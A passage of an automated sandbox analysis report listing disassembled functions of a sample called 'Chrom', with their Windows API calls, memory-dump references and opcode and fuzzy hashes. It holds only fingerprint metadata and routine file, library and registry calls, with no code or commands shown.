                                                                                                                                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4232544981-0
                                                                                                                                                        • Opcode ID: 53a8f7cb008b32df1684ca7605b3377537bbc048e0cddac440998cdd1c1e842b
                                                                                                                                                        • Instruction ID: 2e5c155c25daeb658e204211e68cd4b3eb4ccd1c406d73be233cdb1e8b0034fb
                                                                                                                                                        • Opcode Fuzzy Hash: 53a8f7cb008b32df1684ca7605b3377537bbc048e0cddac440998cdd1c1e842b
                                                                                                                                                        • Instruction Fuzzy Hash: 7AE0BD32000209EBCF126F80EC01AAA3BA6FF04354F248469FA5814121D33299B0AB88
                                                                                                                                                        Function 00407AE2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetFilePointerEx.KERNELBASE(00407AB8,?,?,00000000,00000000,00000000,00408135,00000000,00000000,?,00000000,00407AB8), ref: 00407AFE
                                                                                                                                                          • Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$PointerRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3154509469-0
                                                                                                                                                        • Opcode ID: 6248e0e1ab85731b74595c2f926436b00fccac0aee2fdd6da58cf3d4fee283eb
                                                                                                                                                        • Instruction ID: 95a85ac8c1a6a3d36e5b55df11ef6633e17d41a7181f6212dfb71d7477b24dd9
                                                                                                                                                        • Opcode Fuzzy Hash: 6248e0e1ab85731b74595c2f926436b00fccac0aee2fdd6da58cf3d4fee283eb
                                                                                                                                                        • Instruction Fuzzy Hash: 9CE0EC76100100FFE6615B45DC05F57BBB9EBD4710F14882DB59596164C6326852CB25
                                                                                                                                                        Function 0041686C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FreeLibrary.KERNELBASE(?,?,00413D28,?,?,?,00403D00,?), ref: 0041687D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                        • Opcode ID: 55b2502085225770d96769d1b8c5d2309b5ab18a600f8ce0c91d15f552d81266
                                                                                                                                                        • Instruction ID: 4e210ffbaa2561246213c2b34439051142da87cffede57808e984b83c24c6bff
                                                                                                                                                        • Opcode Fuzzy Hash: 55b2502085225770d96769d1b8c5d2309b5ab18a600f8ce0c91d15f552d81266
                                                                                                                                                        • Instruction Fuzzy Hash: 61E0F6B5901B009FC3308F1BE944417FBF8BEE46113108E6FA4AAC2A21C3B4A5898F94
                                                                                                                                                        Function 00415776 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,0041421F,00000000,000001F7,00000000), ref: 0041577D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                        • Opcode ID: 9cfdbd8db36c6f3a9f02cb46b7a4724c96a864d80a31ec4237d8aa9250ca55a1
                                                                                                                                                        • Instruction ID: ddb578787b485028a6fb96a9d92d5f44c017102101ddf1ac3dc5e6ba6d02f24a
                                                                                                                                                        • Opcode Fuzzy Hash: 9cfdbd8db36c6f3a9f02cb46b7a4724c96a864d80a31ec4237d8aa9250ca55a1
                                                                                                                                                        • Instruction Fuzzy Hash: 4CD0C932800522EFDB10AF26ED457C67378AF60351B150229AC10B34D1CB38BDAB8A98
                                                                                                                                                        Function 0040A8CD Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,004100B1,00000000,00454884,00000002,?,004122A5,00000000,00000000,?), ref: 0040A8E4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileWrite
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                                        • Opcode ID: 6416124c9ca8dda125adc466156433dbc3d8b3aff9fc78592fc4ee70d7722975
                                                                                                                                                        • Instruction ID: e2b393c147c70288cfc451d322548076449ae967400f97464a64d4acce64fec1
                                                                                                                                                        • Opcode Fuzzy Hash: 6416124c9ca8dda125adc466156433dbc3d8b3aff9fc78592fc4ee70d7722975
                                                                                                                                                        • Instruction Fuzzy Hash: 79D0C93511020DFBDF01CF80DC06FDD7BBDEB04359F108064BA1495060D7B59A18AB64
                                                                                                                                                        Function 0040A8AE Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                        • Opcode ID: 6863c831fb060764c36d2ef328c66928a6423640fe431ba3a7638441719afc10
                                                                                                                                                        • Instruction ID: de572b7337c3604c2e63dc95c070a23ff96247b4c3126b3268b21a980102b21a
                                                                                                                                                        • Opcode Fuzzy Hash: 6863c831fb060764c36d2ef328c66928a6423640fe431ba3a7638441719afc10
                                                                                                                                                        • Instruction Fuzzy Hash: D6D0C97501020DFBDF01CF80DD06FDD7B7DEB05359F508064BA0095060C7759A14AB54
                                                                                                                                                        Function 00409C82 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: d7201b6ac2b644285d7a2778af57a6827c0a8e81cd3c62d8215e375c257f2314
                                                                                                                                                        • Instruction ID: cecd821801891233278d9e4f0cdd5aea3aed6bf5cf84d435cc8cf5239d0f839c
                                                                                                                                                        • Opcode Fuzzy Hash: d7201b6ac2b644285d7a2778af57a6827c0a8e81cd3c62d8215e375c257f2314
                                                                                                                                                        • Instruction Fuzzy Hash: 7FC092B0240200BEFE224B10EC15F36669CD780701F2004247E00E40E0C1604E188524
                                                                                                                                                        Function 00409C9B Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,00410072,00000000,?,004122A5,00000000,00000000,?,00000000,00000000), ref: 00409CAD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: 680376a1705957ae3a1bbded056498c64766bd9d2b751ddd79e3da9690a8832c
                                                                                                                                                        • Instruction ID: adc684fa4d176c709e0b5a021f9c2e2f242b30b566e97c1e18dbffa254e16f52
                                                                                                                                                        • Opcode Fuzzy Hash: 680376a1705957ae3a1bbded056498c64766bd9d2b751ddd79e3da9690a8832c
                                                                                                                                                        • Instruction Fuzzy Hash: 56C012F02503007EFF304B10AC0AF37769DD7C0701F1044307E00E40E1C2A14C488524
                                                                                                                                                        Function 0040B671 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,0040B5FD,00000000,0040700C), ref: 0040B678
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??3@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                                        • Opcode ID: 8026c71734dfa41369215d123a13b243002bdb1e268899024844832d7108e649
                                                                                                                                                        • Instruction ID: d23f394f445174d82bf5c374610f4e11a096298af16890c94d1ac581a8101d62
                                                                                                                                                        • Opcode Fuzzy Hash: 8026c71734dfa41369215d123a13b243002bdb1e268899024844832d7108e649
                                                                                                                                                        • Instruction Fuzzy Hash: 56C09BB15117014BFB305E15C40471273D49F60727F354D1DA8D2914C1D77CD440865D
                                                                                                                                                        Function 00416068 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FreeLibrary.KERNELBASE(?,0041608B,00000000,00413FA7,?,?,?,?,?,00403CF9,?), ref: 00416074
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                        • Opcode ID: e9866dcb680b9a0d0965807e9c09656def5765bcc3968a07479bcdd52cf4d20d
                                                                                                                                                        • Instruction ID: c4f7802c24e59161306af1403d88e20ea41b7baad8a9019303b140db1e88e420
                                                                                                                                                        • Opcode Fuzzy Hash: e9866dcb680b9a0d0965807e9c09656def5765bcc3968a07479bcdd52cf4d20d
                                                                                                                                                        • Instruction Fuzzy Hash: ADC04C351107018FE7218B62C949753B7E4AB00316F40C818949685850D77CE854CE18
                                                                                                                                                        Function 0044E188 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000), ref: 0044E199
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                        • Opcode ID: 600d0468050d6c0c974190016e207e925c0ab4fd49a9922a22aac3e50904c676
                                                                                                                                                        • Instruction ID: ca87bd2022555555e1e71ab19cfd3b78776a4971098d47f20d95beb5d2123f01
                                                                                                                                                        • Opcode Fuzzy Hash: 600d0468050d6c0c974190016e207e925c0ab4fd49a9922a22aac3e50904c676
                                                                                                                                                        • Instruction Fuzzy Hash: CCC04C355503008FF7168F22ED4E76A32B4B700357F414D74D40085062EB78C514CA1C
                                                                                                                                                        Function 0040B4E4 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FindClose.KERNELBASE(?,0040B447,?,00000000,004149BF,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040B4EE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseFind
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                                        • Opcode ID: 7b6ab146b4268e51a5c44590b0b181f0b71ff05a35f264cb6b2d58c8236388a4
                                                                                                                                                        • Instruction ID: 4ebaaad3abebb35ea561999068b04e119c5bd0073050e994cd3dd7ff13ec2e23
                                                                                                                                                        • Opcode Fuzzy Hash: 7b6ab146b4268e51a5c44590b0b181f0b71ff05a35f264cb6b2d58c8236388a4
                                                                                                                                                        • Instruction Fuzzy Hash: E6C048341109028AE2285B38985942A76A0AA4A3303B40F6CA0F6920F0EB3899868A08
                                                                                                                                                        Function 0040A157 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                        • Opcode ID: 45ec320b698d0105a77b428ef27c265de4d5060260cc72b868003af4cb6e54e0
                                                                                                                                                        • Instruction ID: 81611b1af33cf8bffabafaac40f523e309f93145d8b60d33e97b966a2711c68d
                                                                                                                                                        • Opcode Fuzzy Hash: 45ec320b698d0105a77b428ef27c265de4d5060260cc72b868003af4cb6e54e0
                                                                                                                                                        • Instruction Fuzzy Hash: 93B012792104009BCB080734DE4504E35505F49631760073CB033C00F0DB20CC64BA00
                                                                                                                                                        Function 00416466 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00416C27,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,004148A8,?,?,00000000), ref: 00416479
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Open
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                        • Opcode ID: fdd4ee8420ff38d50ee0fd67c97a440200559db92fa8313b56074c36fcf39447
                                                                                                                                                        • Instruction ID: 83906f0e37f9444889d0528ca96d09476c9ae61f439c3988bf04068afc79b07d
                                                                                                                                                        • Opcode Fuzzy Hash: fdd4ee8420ff38d50ee0fd67c97a440200559db92fa8313b56074c36fcf39447
                                                                                                                                                        • Instruction Fuzzy Hash: 01C09B39544301BFDF114F40FE05F0ABB61ABC4B05F004414B344240B282714414EB17
                                                                                                                                                        Function 0041DDA9 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c265d845e0503975fe3eaa0d393b723af7b5bd811e49d12fd140daf2da0adf48
                                                                                                                                                        • Instruction ID: 44a613232f5d856dc5ac7483348cac20a1fabfd44cd96dfcc582b64180e5c4d2
                                                                                                                                                        • Opcode Fuzzy Hash: c265d845e0503975fe3eaa0d393b723af7b5bd811e49d12fd140daf2da0adf48
                                                                                                                                                        • Instruction Fuzzy Hash: 16319CB1A01B05EFDF24AF15D8417DA73A0BB21356F15412BF8149B241D738ADE0CBDA
                                                                                                                                                        Function 004083CC Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2081463915-0
                                                                                                                                                        • Opcode ID: 13af99538766b2a182500595b229227d4534b1020d2eec3942169f622147e130
                                                                                                                                                        • Instruction ID: 355d7b68675bcf71531e109d1974fa15c2d23b2ab6a250ec1a74cd6812f94247
                                                                                                                                                        • Opcode Fuzzy Hash: 13af99538766b2a182500595b229227d4534b1020d2eec3942169f622147e130
                                                                                                                                                        • Instruction Fuzzy Hash: 3F115E71600606AFCB14DF65C9C199EB7F8FF44314B10853EE596E3282EB34F9459B68
                                                                                                                                                        Function 00407A50 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
